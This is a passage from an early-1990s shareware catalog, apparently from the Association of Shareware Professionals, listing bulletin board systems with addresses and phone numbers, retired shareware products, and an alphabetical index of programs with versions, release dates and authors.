01915 + BBS Phone: 508-927-7224 + + The Other BBS + Address: PO BOX 6501, HARRISBURG PA 17112 + BBS Phone: 717-657-8699 + + THE PC JUNCTION BBS + Address: 323 TN NURSERY RD., CLEVELAND TN 37311 + BBS Phone: 615-478-2890 + + The Point BBS + Address: 122 CEDAR ST, STEVENS POINT WI 54481 + BBS Phone: 715-345-1327 + + The PROF-BBS + Address: 2050 IDLE HOUR CENTER STE 106, LEXINGTON KY 40502 + BBS Phone: 606-269-1565 + + Appendix C, "Bulletin Boards" 471 + + + + The Red Phone Information Sys + Address: 215 WEST 11TH STREET, NEW YORK NY 10014 + BBS Phone: 212-924-1138 + + The RoadHouse BBS + Address: 4095-B CREEK WAY, INDIANAPOLIS IN 46227-4036 + BBS Phone: 317-784-2147 + + The Round Table BBS + Address: PO BOX 6731, WYOMISSING PA 19610 + BBS Phone: 215-678-0818 + + The Shareware Support BBS + Address: 26 STANLEY HILL AVE, AMERSHAM BUCKS HP7 9BD U K + BBS Phone: 44 494 431861 + + The TIMES + Address: 1500 CENTRAL AVENUE, ALBANY NY 12205 + BBS Phone: 518-452-4757 + + The Total Access BBS + Address: 109 MASSACHUSETTS AVE, LUNENBERG MA 01462 + BBS Phone: 508-342-5998 + + The TOY SHOP-PC BBS + Address: 4195 ELWOOD ROAD, SPRING HILL FL 34609 + BBS Phone: 904-688-9124 + + THE TWILIGHT ZONE + Address: 1119 E. MAIN STREET, AUBURNDALE WI 54412 + BBS Phone: 715-652-2758 + + THE WINDOWS BBS + Address: 115-H PINEWOOD CRESCENT, YORKTOWN VA 23693 + BBS Phone: 804-766-0553 + + Totoche BBS + Address: 6305 BEAUCOURT, MONTREAL-NORD QC H1G 2G3 CANADA + BBS Phone: 514-326-8363 + + Turning Point Information Svc + Address: 12511 TURKEY RIDGE, AUSTIN TX 78729 + BBS Phone: 512-219-7828 + + ULYSSES SYSTEMS NETWORK + Address: 735 S. JAMES STREET #37, ROME NY 13440 + BBS Phone: 315-339-5591 + + Uncle Bob's BBS + Address: 924 APACHE TRAIL, LAKE VILLA IL 60046 + BBS Phone: 708-265-0698 + + Appendix C, "Bulletin Boards" 472 + + + + Visions InfoLine + Address: 885 STERLING ST., PLAINFIELD NJ 07062 + BBS Phone: 908-769-1779 + + Windchimes BBS + Address: PO BOX 2100, JUPITER FL 33468 + BBS Phone: 407-220-3312 + + WINGIT + Address: 1929 NORTH MISSION ROAD, TALLAHASSEE FL 32303 + BBS Phone: 904-386-8693 + + WOLVERINE + Address: 4702 JEFFERSON, MIDLAND MI 48640 + BBS Phone: 517-631-3471 + + Xanadu + Address: 34 DANE STREET, BEVERLY MA 01915 + BBS Phone: 508-921-2204 + + Xevious BBS + Address: 92 BISHOP DRIVE, FRAMINGHAM MA 01701-6515 + BBS Phone: 508-875-3618 + + ZEN DEN SYSTEMS BBS + Address: 305 KREST STREET, MADERA CA 93637 + BBS Phone: 209-675-8436 + + [PARAMETERS]InformationService + Address: 513 W. WALNUT ST., CARBONDALE IL 62901-2613 + BBS Phone: 618-549-8448 + + Appendix D, "Retired shareware" 473 + + + + + + Appendix D + Retired shareware + + This appendix lists shareware products now "retired" by the + author. Retired products no longer receive the minimum levels + of support, and the authors have agreed to return any registra- + tion fees sent in for the software. + + An author may retire a shareware product for any number of + reasons. Some applications have outlived their usefulness; + others may have grown too costly to continue supporting due to + competition from other authors. + + + Product: Home Money Manager II (and I) + HomeCraft Software + Home checkbook and budgeting. + + Product: Penname + R.K. West Consulting + Create pennames & character names for writers. + + Product: Soothsayer aka Oracle + R.K. West Consulting + I Ching and Tarot. + + Product: Stardial + GTX Software + AutoDialer For Galaxy/Starlink Service. + + Product: Your Financial Advisor + HomeCraft Software + Loan and finacial calculations. + + Appendix E, "Sorted list of all programs" 474 + + + + + + Appendix E + Sorted list of all programs + + This appendix notes the author of each program listed in this + catalog. It comes in extremely handy when you want to see if a + given program comes from an ASP member, or when you want to + know the current version number/release date for a program. + Hint: look in the index for the program (by name) if you want + to see a full description for the program or learn the author's + address & phone number. You'll find page references to all the + information you need. + + + 3 ball Juggler 1.13 (12-08-91) -- First Magnitude + 4DOS 4.0 (08-26-91) -- JP Software Inc. + 4EDIT 1.09 (10-13-91) -- XD Systems + 4FILES 2S.4 (03-31-92) -- Hand-Crafted Software + 4Print 4.1 (08-15-91) -- Korenthal Associates, Inc. + 4Shell for Windows 1.0 (08-21-91) -- ZPAY Payroll Systems, Inc. + (Paul Mayer) + 4ZIP/4UNZIP 2.00 (10-24-91) -- XD Systems + -=Tab123=- 1.2 (12-17-91) -- Mountain Software + AC11TO10 2.20 (03-01-92) -- Software Designs, Inc. + ACCEL 1.0 (11-01-91) -- JSOFT + ACCU BBS Lister 3.0 (06-18-91) -- Kevin Fischer + ACCU Music Printer 2.1 (03-23-91) -- Kevin Fischer + ActaeOn V1.60 (11-12-91) -- Jon Clempner + ActCalendar 2.5 (01-22-91) -- ShareGames + ActMenu 5.9 (05-04-91) -- ShareGames + The Address Book Solution 2.1 (05-31-91) -- GSF Software & + Solutions + Aerosoft Fitness Log 2.3 (10-15-91) -- Aerosoft + AFFORD IT??? 3.02 (08-22-91) -- Garrett Krueger Software + Development + ALBUM KEEPER II 2.12 (06-01-91) -- CACHE MICROSYSTEMS + AlbumMaster 6.71 (09-02-91) -- Unicorn Software Limited + ALITE 1.10f (12-15-91) -- TRIUS, Inc. + ALLY 1.32 (03-18-91) -- Wasco Technical Software + ALPHAQUOTE 2.3 (05-06-91) -- AlphaBytes, Inc. + ALPS 3.0 (11-15-91) -- ALPS Software + ALPS(PC) 3.0 (11-15-91) -- ALPS Software + AM-EDIT 1.00 (01-10-92) -- PLC Software + AMORTIZATION TABLE 3.52 (04-26-91) -- H&P Software + AMORTZ 1.30 (06-30-91) -- Oregon Software Group + Ample Notice 2.04 (05-21-91) -- Granny's Old-Fashioned Software + AntiC 1.11 (02-02-92) -- Cascoly Software + APCAL 3.10 (01-10-92) -- Gamma Software + Approved Vendor Requirements n/a (07-01-91) -- Association of + Shareware Professionals + Architectural Engineering 3.0 (11-15-91) -- ALPS Software + AS-EASY-AS 5.00c (01-13-92) -- TRIUS, Inc. + + Appendix E, "Sorted list of all programs" 475 + + + + ASP BBS Membership Application n/a (02-15-91) -- Association of + Shareware Professionals + ASP Catalog for BBSs n/a -- Association of Shareware + Professionals + ASP Catalog for CompuServe n/a -- Association of Shareware + Professionals + ASP Catalog for GEnie n/a -- Association of Shareware + Professionals + ASP List of Approved BBSs n/a (07-01-91) -- Association of + Shareware Professionals + ASP List of Approved Vendors n/a (07-01-91) -- Association of + Shareware Professionals + ATC: Air Traffic Controller 1.0 (09-29-85) -- Cascoly Software + Attribution 1.12 (06-09-91) -- Richard W. Adams + AutoCon 2.0g (03-14-92) -- Larry Weaver + AxTrons 1.0 (02-17-90) -- ShareGames + Babble! 2.0 (02-08-91) -- Korenthal Associates, Inc. + Backup 2.05 (06-16-91) -- Richard W. Adams + Backup/2 1.01 (07-07-91) -- Richard W. Adams + Badge-O-Magic 1.2 (07-10-89) -- Ward Mundy Software + BakupWiz 3.29fl (01-03-92) -- PCX + Balloons 3.8 (03-29-91) -- AssistWare + Bannerific 1.1 (01-01-91) -- TexaSoft + Bass Class 1.2 (03-22-91) -- Olsen Outdoors + BassTour 4.5 (03-26-91) -- Olsen Outdoors + BatchMaker Plus 2.5 (12-12-91) -- Northland Multisoft + BATUTIL 4.0 (12-23-91) -- CTRLALT Associates + BCS Menu Program 2.0 (12-10-90) -- Bristol Computing Systems, + Inc. + BESTTEST 1.5 (06-01-91) -- WiseWare + The Better Diet Analyzer 3.1 (01-11-92) -- Syntonic Software + BlackJack! 2.21p (06-05-91) -- Glencoe Computing + BLANK-IT 5.1a (03-02-92) -- Rhode Island Soft Systems, Inc. + Bmenu 5.41 (09-17-90) -- Mark Strong + Book Librarian 1.5s (01-28-92) -- TurboSystemsCo + Book of Changes 1.61 (03-01-92) -- R.K. West Consulting + BOOKLET 3.6 (10-23-91) -- Sympathetic Software + BOOKLET-SCREEN 1.3 (10-23-91) -- Sympathetic Software + BOOT.SYS 1.42 (07-03-91) -- Hans Salvisberg + BootMaster 3.0 (01-01-92) -- RoSi Software + Border 1.1 (02-23-89) -- Cascoly Software + BOXER(tm) Text Editing System 3.20 (01-25-92) -- BOXER Software + BRAINdead2 1.00 (09-04-91) -- Michael Donat + Brandon's Bigbox 1.5 (02-04-92) -- Robichaux and Associates + BridgePal 2.02 (04-29-90) -- WR Software + Brother's Keeper 5.0 (01-01-92) -- John Steed + Browse/2 1.34 (07-26-91) -- Wolf Software Design + Btr Help! 1.88 (06-15-91) -- Informative Technologies + Btr Watch 1.0 (09-15-91) -- Informative Technologies + Business Plan Master (IBM) 1.2 (03-21-92) -- Grand Universal + Business Plan Master (Mac) 1.2 (03-25-92) -- Grand Universal + By the Numbers 4.52 (03-01-92) -- R.K. West Consulting + C.A.R.S. 2.8 (03-27-92) -- Cybernetic Software + CADET 3.0 (03-18-91) -- Wasco Technical Software + + Appendix E, "Sorted list of all programs" 476 + + + + Calculation Solitaire 1.12 (12-23-91) -- Daniel Thomas + CALC_JNC 8.24 (02-24-92) -- James N. Cox + Calendar Keeper 3.0a (02-02-91) -- Dataphile Software + Calendar Mate 4.1 (06-01-91) -- Hawk Software + CALendar preview for SideKick 2 1.03 (05-13-91) -- WetZoft + Applications + CALendar RePorT for SideKick+ 2.51 (04-08-91) -- WetZoft + Applications + CALendar report for TRaVel 1.05 (04-08-91) -- WetZoft + Applications + Calendar Wise 1.0 (01-25-92) -- BLUE CANNON SOFTWARE + Canfield For Windows 1.01 (01-04-92) -- Daniel Thomas + Capbuf 1.41 (12-28-90) -- Cascoly Software + Capital Gainz 3.0 (02-24-92) -- DBLinx + Cash Control 1.21S (01-01-91) -- Adrian-Thomas Developments, Inc. + CassetteMaster 7.40 (07-20-91) -- Unicorn Software Limited + CATALOG-ON-A-DISK 2.00 (03-15-92) -- EmmaSoft + CatScan 3.0 (06-15-91) -- Rochester Heritage + CDMaster 6.71a (10-06-91) -- Unicorn Software Limited + Changer/2 1.01 (07-06-91) -- Richard W. Adams + Charge Account Management Prog. 1.11 (11-08-89) -- M. P. Data + Checkbook Management Program 5.03 (05-07-90) -- M. P. Data + "Cheque-It-Out" 1.1C (03-01-91) -- Hooper International, Inc. + The Children's Graphics Program 3.0 (12-12-91) -- Motes + Educational Software + Chris's Automobile Recorder 12.2A (03-28-91) -- Cooney Applied + Technology + CHRONOS 2.05 (03-30-92) -- Cascoly Software + Church Membership Tracking Sys 3.0 (07-06-91) -- Torbert Data + Systems, INC. + Cipher 2.1 (10-09-91) -- Arcanum Computing + Cipher for Windows 1.0 (10-02-91) -- Arcanum Computing + The Cipher-Ace Series 2.0 (02-28-92) -- Charles W. Stewart + Circle Link 1.1 (06-12-90) -- ShareGames + Citizen 3.02 (01-01-92) -- R.K. West Consulting + CleanUp 2.1 (11-02-90) -- ShareGames + ClipMate for Windows 1.11 (02-13-92) -- Chris Thornton + CLOCK 2.00 (01-10-92) -- Gamma Software + CM_FILER 5.22 (03-09-92) -- NoVaSoft + CNC-Transedit 1.1 (12-12-91) -- Northland Multisoft + CODE TO CODE 4.0 (04-29-91) -- AlphaBytes, Inc. + Collect! (VGA version) 1.01 (01-01-92) -- Alston Software Labs + COM-AND 2.8 (10-19-91) -- CABER Software + Command Post 7.0S (02-15-91) -- Wilson WindowWare, Inc. + Complement & Schedules 3.0 (11-15-91) -- ALPS Software + Complement & Schedules(PC) 3.0 (11-15-91) -- ALPS Software + CompUser 2.70a (06-21-91) -- Unicorn Software Limited + Computer Trivia Quiz 1.0 (09-07-91) -- Shoestring Software + ConvDW 1.2 (01-20-90) -- CrossCourt Systems + Convert To Structured BASIC 1.3 (11-15-91) -- Unique Software + Creativity Package 3.1 (03-01-92) -- R.K. West Consulting + CROSSDOWN 2.6 (02-24-92) -- Sam Bellotto Jr. + Crossword Clipper for Windows 1.00 (02-01-92) -- PC HELP-LINE + Crossword Creator 5.00 (02-01-92) -- PC HELP-LINE + + Appendix E, "Sorted list of all programs" 477 + + + + CROSSWORD POWER 4.00 (01-02-92) -- WISCO Computing + Crystal Ball 3.11 (03-01-92) -- R.K. West Consulting + CtrlcLib 1.0 (01-01-91) -- Trendtech Corporation + Cumberland Diary 1.0 (05-27-91) -- Cumberland Software + Cumberland Story 1.0 (05-28-91) -- Cumberland Software + Cumberland Tree 3.2 (11-27-91) -- Cumberland Software + Curses! 2.11 (03-01-92) -- R.K. West Consulting + Custodial Requirements 3.0 (11-15-91) -- ALPS Software + Custodial Requirements(PC) 3.0 (11-15-91) -- ALPS Software + Custom#Menu 1.81 (12-18-91) -- Mountain Software + Dad's Choice 2.0 (09-09-91) -- Motes Educational Software + DaMenu 1.1 (04-02-92) -- Just-In-Time Computing Services + DARN! Don't Forget! 3.00 (07-12-90) -- EmmaSoft + DasBOOT! 1.30 (02-07-92) -- WHEEL Games + DayMaster 3.70a (11-10-91) -- Unicorn Software Limited + DAYO ACCOUNTS PAYABLE (AP) 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO ACCOUNTS RECEIVABLE (AR) 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO BACK ORDERS (BO) 2.0 (04-01-91) -- TJS LAB, Inc. + DAYO BAR CODE 3 OF 9 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO BILLING & INVOICING 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO END OF PERIOD 3.0 (06-24-91) -- TJS LAB, Inc. + DAYO GENERAL LEDGER (GL) 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO INDEX 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO INVENTORY 3.1 (06-27-91) -- TJS LAB, Inc. + DAYO LITTLE POS 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO LOOKUP 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO MEMBERSHIP 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO MENU 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO MRP 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO ORDER ENTRY 3.0 (06-12-91) -- TJS LAB, Inc. + DAYO PASSWORDS 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO PAYROLL 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO POS (POINT OF SALE) 3.1 (06-28-91) -- TJS LAB, Inc. + DAYO PRICE BOOK 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO QUOTES 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO RENTAL POS 3.0 (06-26-91) -- TJS LAB, Inc. + DAYO RETURN MANAGEMENT SYSTEM 2.0 (05-01-91) -- TJS LAB, Inc. + DAYO RETURNS & REFUNDS 2.0 (06-28-91) -- TJS LAB, Inc. + DAYO SIMPLE POS 2.0 (06-01-91) -- TJS LAB, Inc. + DAYO SMART REPORTS 3.0 (06-28-91) -- TJS LAB, Inc. + DAYO TIME & BILLING 3.0 (06-24-91) -- TJS LAB, Inc. + DB2DOC 2.0 (06-30-91) -- Carlos Berguido + DB2PRG 2.1 (06-30-91) -- Carlos Berguido + dbDIAL(tm) 1.02 (01-06-92) -- ZPAY Payroll Systems, Inc. (Paul + Mayer) + dBF-View 1.0 (06-01-91) -- MSC - Morariu Software Consulting + Decision Analysis 3.0 (11-15-91) -- ALPS Software + Decision Analysis(PC) 3.0 (11-15-91) -- ALPS Software + Decoder! 1.2 (09-13-91) -- Trinity Software + DialThat 1.03 (02-01-91) -- Real Software + DICOGO 3.0 (09-30-91) -- DI Management Corporation + DIMANAGE 2.1 (06-14-91) -- DI Management Corporation + Dinger 2.0 (02-15-91) -- Pinecliffe International + DirBack 3.6 (01-21-91) -- ShareGames + + Appendix E, "Sorted list of all programs" 478 + + + + DIRECT MAINT 2.0 (07-01-89) -- MORSOFT + Director 2.03 (06-09-91) -- Richard W. Adams + Directory Freedom 4.50 (12-05-91) -- Bit Masons Consulting + Directory-Manifest 1.0 (12-22-91) -- Northland Multisoft + DIREDIT 3.05 (05-31-90) -- Computer Counselors, Inc. + DiscTrak System 1.62 (10-08-91) -- Blam Entertainment Group + Disk DUP 5.9a (11-08-90) -- FormGen Corp. + Disk Manager (CUDM) 3.30 (08-01-91) -- Micro System Solutions + Disk OrGanizer (DOG) 3.14 (08-18-91) -- Soft GAM's Software + DISK SPOOL II 4.00 (06-27-91) -- Budget Software Company + DISKLIST 2.10 (04-24-91) -- Gulf Sierra + DiZk4D 3.03 (11-18-91) -- Unicorn Software Limited + DiZkND 2.11 (11-25-91) -- Unicorn Software Limited + DJ-CHECK 1.01 (03-01-92) -- JMJ Software + DJ-LOPE 3.0 (03-01-92) -- JMJ Software + DJ-SLEEVE 2.0 (03-01-92) -- JMJ Software + dLITE 2.0 (07-01-91) -- Ward Mundy Software + DMP 2.05 (01-15-91) -- DMP Software + DMPLAS (Dot Matrix to LaserJet) 1.0 (08-15-91) -- Software Co-op + DOS Extensions for Professional 1.1 (09-02-91) -- Allison + Software + DOS Summary 1.01 (02-23-91) -- Computer Knowledge + DOS Summary (Hypertext) 2.0 (02-15-92) -- Computer Knowledge + DosEA 1--For Absolute Beginners 2.00 (05-19-91) -- Langin + Software + DosEA 2--What is DOS? 2.00 (05-19-91) -- Langin Software + DosEA 3--10 Easy Commands 2.00 (05-19-91) -- Langin Software + DosEA 4--Find That Command! 2.00 (05-19-91) -- Langin Software + DosEA 5--All About MS-DOS 5.0 1.00 (07-05-91) -- Langin Software + DosEA 6--Switched on DOS 1.00 (09-14-91) -- Langin Software + Dr. Motes' Colorbook 1.0 (02-02-92) -- Motes Educational Software + DRAFT CHOICE 1.51g (01-09-92) -- TRIUS, Inc. + DrawSome 2.4 (03-30-91) -- AssistWare + DressMeUp 2.2 (11-14-90) -- ShareGames + dtSearch 1.1 (08-14-91) -- DT Software, Inc. + Dueling Dragons 1.0 (02-02-90) -- ShareGames + Dupes 3.10 (01-11-92) -- Richard W. Adams + Duplicate File Locator (DFL) 3.11 (01-01-91) -- W.S. Ataras + Engineering + Duplicate File Manager 3.0 (09-01-91) -- Micro System Solutions + Early Bird 1.0f (08-17-91) -- Allan Computer Products + Easy Access 6.2a (05-20-91) -- TengWare Enterprises + EASY BANKING 1.2 (01-01-92) -- The Durol Company + Easy Format 3.20 (11-30-90) -- Falk Data Systems + Easy Project 4.02 (05-01-91) -- Parcell Software + Easydial 3.6 (07-10-91) -- Patri-Soft + Ecomaster 1.1 (11-15-90) -- Cascoly Software + EDDY (EDit DirectorY) 6b2 (01-04-92) -- John Scofield + EDWORD 1.0 (11-26-91) -- FAGERLUND CONSULTING + EE 3.0 (11-15-91) -- ALPS Software + EGA Mouse Paint 4.2 (01-30-92) -- Fischer Grafix & Software + EGATrek 3.0 (01-22-92) -- Arcanum Computing + EGAWHEEL V.17.0S (01-01-92) -- WHEEL Games + ELECTRON 2.5 (04-23-91) -- H&P Software + + Appendix E, "Sorted list of all programs" 479 + + + + EliteCheck 1.1a (10-01-91) -- Taewoong Jeon + EM Klondike 3.01 (05-01-91) -- EM Software + EM Poker Solitaire 2.0 (05-30-91) -- EM Software + EM Pyramid 1.07 (05-30-91) -- EM Software + Enveloper 3.2 (05-07-91) -- Pinecliffe International + ENVI-MAN 1.00 (04-26-91) -- Micrometric + EQUALIZER 1.03 (03-20-92) -- Nine-Patch Software + ESF's DeskJet Fonts & Utilities 1.5 (07-10-91) -- Elfring Soft + Fonts + ESF's European DeskJet Fonts 1.0 (07-10-91) -- Elfring Soft Fonts + ESF's European LaserJet Fonts 1.0 (05-20-91) -- Elfring Soft + Fonts + ESF's LaserJet Fonts & Util. 1.5 (07-10-91) -- Elfring Soft Fonts + Ethics Awareness 1.1 (03-21-92) -- Niche Software + EVA 1.12 (05-01-91) -- Gateway Software + Except 2.00 (06-15-91) -- Richard W. Adams + EXTENDED BATCH LANGUAGE-PLUS! 4.07 (07-01-91) -- Seaware Corp. + EZ-Reader 1.33 (09-30-90) -- Thumper Technologies + EZ-Reader 2.00 (08-02-91) -- Thumper Technologies + Family Tree Print Utility C (03-01-91) -- Common Sense Software + Fantasy 2.0 (09-01-90) -- Natural Software + FAST INVOICE WRITER 4.91 (07-23-91) -- H&P Software + FAST STATEMENT WRITER 4.1 (07-11-91) -- H&P Software + FASTFILE 5.33 (07-09-91) -- Interactive Mini Systems, Inc. + FASTMAIL 2.27 (06-01-91) -- CACHE MICROSYSTEMS + fastmenu GOLD 4.1 (09-01-91) -- jwh: SoftWare + FBNCAT 3.0 (11-01-90) -- FBN Software + FCOMP 1.01 (01-10-92) -- Gamma Software + FDplot 1.2 (02-27-92) -- Abri TEchnologies, Inc. + Federal Express Label Printer 1.01a (01-11-91) -- TVSware (Tom + Sollas) + Fictionary 1.32 (04-30-90) -- Cascoly Software + FIELD GENERAL 5.0 (08-27-91) -- rbm software + FILE PATCH 2.0 (07-01-89) -- MORSOFT + FILE-MAN 4.21 (05-24-91) -- Micrometric + FileFinder 3.8 (04-01-92) -- California Software Design + Filer! 1.92 (12-16-91) -- Trinity Software + FileXref 1.3 (10-01-91) -- ConVal Software, Inc. + Find Area Code (FAC) 1.61 (11-18-91) -- Mountain Data Systems + First Expedition 4.0 (01-01-92) -- Steve Englestad + FISHBYTE(tm) 1.2 (01-07-92) -- EJM Computer Consulting Ltd. + Flex 1.02 (06-16-91) -- Logical Systems + FlexBase 1.0 (11-20-91) -- National MicroSystems + FLEXIBAK Plus 2.01 (03-11-92) -- Nildram Software + Flow Process 3.0 (11-15-91) -- ALPS Software + Flow Process(PC) 3.0 (11-15-91) -- ALPS Software + Flu_Shot+ 1.82 (05-11-91) -- Software Concepts Design + Folders 3.4a (07-29-91) -- Sloop Software + FormGen 4.1a (12-19-90) -- FormGen Corp. + FormGen Business Collection 1.0 (07-23-90) -- FormGen Corp. + FormGen Fill 1.5 (12-19-90) -- FormGen Corp. + FormGen Home Collection 1.0 (07-23-90) -- FormGen Corp. + FormGen Utility Pak #1 1.01 (10-30-90) -- FormGen Corp. + Fortune Teller 3.51 (08-15-91) -- R.K. West Consulting + + Appendix E, "Sorted list of all programs" 480 + + + + FOURU 2.0 (07-01-91) -- GTX Software + FPLAN-Captital Needs Planner 3.0 (04-21-91) -- First Financial + Software + FPLAN-Education Funding Planner 3.0 (04-21-91) -- First Financial + Software + FPLAN-Income Protection Planner 3.0 (04-21-91) -- First Financial + Software + FPLAN-Personal Financial Plnr 3.0 (04-21-91) -- First Financial + Software + FPLAN-Retirement Planner 3.0 (04-21-91) -- First Financial + Software + Furniture & Equipment Survey 3.0 (11-15-91) -- ALPS Software + Furniture, Equipment Survey(PC) 3.0 (11-15-91) -- ALPS Software + GEMCAP 4.01 (09-01-90) -- Natural Software + Geomancy 4.04 (03-01-92) -- R.K. West Consulting + Get Lucky! 2.25 (06-05-89) -- Glencoe Computing + Getkey/2 1.00 (02-25-90) -- Richard W. Adams + Globally 1.22 (06-09-91) -- Richard W. Adams + Globally/2 1.11 (07-06-91) -- Richard W. Adams + Gopher's Garden 1.1 (06-17-90) -- ShareGames + GRAB Plus(r) 6.1 (09-20-91) -- ZPAY Payroll Systems, Inc. (Paul + Mayer) + GRAB Plus(r) for Windows 1.3 (09-20-91) -- ZPAY Payroll Systems, + Inc. (Paul Mayer) + GRADE BOOK POWER 3.00 (01-02-92) -- WISCO Computing + Graphical Representation 3.0 (11-15-91) -- ALPS Software + Graphical Representation(PC) 3.0 (11-15-91) -- ALPS Software + GREEN 1.02 (03-30-92) -- Cascoly Software + HandyDOS 1.2 (02-27-92) -- Abri TEchnologies, Inc. + Hangman for Students 1.01 (03-09-91) -- Langin Software + Hard at Work 1.1 (06-01-91) -- R.K. West Consulting + Hard Disk Director 5.0 (02-09-92) -- Canyon Software + HDM IV - Hard Disk Menu IV 3.10 (06-28-91) -- MicroFox Company + HDTEST 5.35a (10-20-91) -- Computer Counselors, Inc. + Hearts 6c (01-15-92) -- CareWare + HelpPC Quick Reference Utility 2.10 (07-01-91) -- David Jurgens + HiMOVE 2.14 (11-01-90) -- C.Sitte Softwaretechnik + HOME BUDGET MANAGEMENT SYSTEM 4.21 (05-20-91) -- Brentson Worrell + Home Helper 1.3 (11-09-91) -- Torbert Data Systems, INC. + Home Sales System 3.2 (02-04-92) -- Grumpyware + Hotnet 3.04 (02-04-92) -- Robichaux and Associates + Household Register 3.0s (01-28-92) -- TurboSystemsCo + HouseHold TRACKER 1.3a (02-10-92) -- Fischer Grafix & Software + How to join as a "beta" author n/a (11-27-89) -- Association of + Shareware Professionals + HowTwo 2.1 (02-05-91) -- ShareGames + HUGO II, WHODUNIT? 1.1 (06-02-91) -- Gray Design Associates + HUGO'S HOUSE OF HORRORS 1.6 (06-02-91) -- Gray Design Associates + HyperPAD 2.2 (05-22-91) -- Brightbill-Roberts and Company, Ltd. + HyperSlide 1.02 (05-12-91) -- John Intorcio + I.Q. Challenge 1.23 (03-01-92) -- R.K. West Consulting + IBM PC Author Application n/a (07-01-91) -- Association of + Shareware Professionals + ICP 7.0 (02-01-92) -- Spirit7 Software, Ltd. + + Appendix E, "Sorted list of all programs" 481 + + + + InContext 1.02 (10-21-91) -- Rams' Island Software + Index! 1.4e (05-30-91) -- Trinity Software + Information about copyrights n/a (04-29-90) -- Association of + Shareware Professionals + Information Please 2.07 (06-26-91) -- TexaSoft + InstaCalc 3.00 (06-01-91) -- FormalSoft + Integrity Master(tm) 1.11a (02-17-91) -- Stiller Research + Japanese Business Culture 1.1 (03-23-92) -- Niche Software + JDIR 1.1 (01-11-90) -- Cybernetic Software + JEPRS (Jeepers!) 2.54 (10-20-91) -- Louis M. Miranda + JetPilot LaserJet Control 1.2 (08-18-91) -- Morton Utilities + Jewel Thief 1.2 (02-08-92) -- ServantWare + KEYTREE TOOLBOX 3.10 (08-01-91) -- REWSE CONSULTANTS LIMITED + KEYTREE UTILITIES 3.10 (08-01-91) -- REWSE CONSULTANTS LIMITED + KICK 1.0 (07-01-91) -- TexaSoft + KP5 5.07 (01-27-92) -- Peter Charpentier + KWIKSTAT 2.1 (05-24-91) -- TexaSoft + KWIKWRITE 4.01 (01-01-91) -- TexaSoft + LambChop 1.02 (01-21-92) -- LambWare + LAN-LINK 1.59 (04-01-91) -- Software for Amateur Radio + LaserForm 1.00 (07-01-91) -- Real Software + LASR-MAN 2.11 (05-24-91) -- Micrometric + the last word 1.00 (11-25-90) -- Bit Masons Consulting + LaunchCAD 3.7 (10-07-91) -- Mountain Software + Launcher 1.21 (06-09-91) -- Richard W. Adams + Layout 2.0 (06-01-91) -- Software Co-op + Layout Planning 3.0 (11-15-91) -- ALPS Software + Layout Planning(PC) 3.0 (11-15-91) -- ALPS Software + LCD: Led's Change Directory 3.1a (05-06-91) -- Keith Ledbetter + LEANER 1.52 (10-10-91) -- MoonStone Software + LessonPlanZ 2.10 (01-07-92) -- Unicorn Software Limited + Listico 2.00 (05-01-91) -- Gateway Software + Lite Format 1.20 (03-15-91) -- Falk Data Systems + LiteComm(tm) for Microsoft C 6.00 (07-01-91) -- Information + Technology, Ltd. + LiteComm(tm) for Turbo C 6.00 (07-01-91) -- Information + Technology, Ltd. + LiteSPM 1.01 (07-01-91) -- Information Technology, Ltd. + Little Black Book 1.41 (12-12-91) -- GTX Software + LJ-SLEEVE 1.0 (03-31-92) -- JMJ Software + LK4.EXE 2.0 (10-20-91) -- GTX Software + Loan Amortization 1.0 (06-01-91) -- TexaSoft + LOANS & SAVINGS 1.01 (06-21-91) -- Northland Multisoft + LOGGIT 4.00 (01-01-91) -- GTX Software + LOGIK MENU 1.61 (07-10-91) -- LOGIVISION INC. + Lotto Challenger 3.6 (01-01-91) -- Data Solutions + LOTTO PROPHET 3.01 (06-01-91) -- DataMicro, Inc + The LOTTO SIMULATOR 1.0 (08-20-91) -- Brentson Worrell + Lotto Thunder 1.00 (10-21-91) -- Charles P.Staats + LoveDOS 1.3 (06-01-91) -- R.K. West Consulting + LQ 2.35 (10-01-90) -- Granny's Old-Fashioned Software + LQMATRIX 4.3 (03-15-91) -- Jimmy Paris Software + MacIntosh Author Application n/a (07-01-91) -- Association of + Shareware Professionals + + Appendix E, "Sorted list of all programs" 482 + + + + Magic Brush & Magic Show 1.50 (08-16-89) -- Nassib Nassar + Mah Jongg--Solitaire 3.51 (08-09-91) -- Arcanum Computing + Maillist / M-Label 5.25/3.2 (01-29-92) -- R.K. West Consulting + MakeDemo 3 (06-04-91) -- WindhamWoods Publishing + Maker 1.02 (06-09-91) -- Richard W. Adams + Man/machine Process 3.0 (11-15-91) -- ALPS Software + Man/Machine Process(PC) 3.0 (11-15-91) -- ALPS Software + Mass-Store Copy 2.6 (04-01-91) -- Informative Technologies + Master Meal Manager 1.51 (01-09-92) -- Thomas C. Johnson + MathAttack 1.0 (12-22-91) -- Northland Multisoft + MAXI Form 1.7 (02-14-92) -- Herne Data Systems Ltd + MaxMan 1.2 (05-28-90) -- ShareGames + Mayan Calendar 3.51 (03-01-92) -- R.K. West Consulting + MAZE3 3.0.6 (01-19-89) -- Stiller Research + MegaHost 1.1 (02-15-92) -- ASCII Computer Enterprises + Melissa's Music Flashcards 2.0 (01-30-92) -- Fischer Grafix & + Software + MEMORY 2.2R (04-01-91) -- Jimmy Paris Software + MENU ACE 1.20 (11-30-91) -- Blue Ace Software + MENU-MAN 1.21 (05-24-91) -- Micrometric + MenuDIRECT Gold 3.0 (06-01-91) -- Applied Micro Systems + Technology + MenuEase 1.6.3 (08-10-91) -- Creative Computer + Mercury 2.06 (07-01-91) -- Real Software + MERIT BADGE TRACKER 2.1 (12-15-91) -- Robert Barrentine + Methods Time Measurement 3.0 (11-15-91) -- ALPS Software + Methods Time Merasurement(PC) 3.0 (11-15-91) -- ALPS 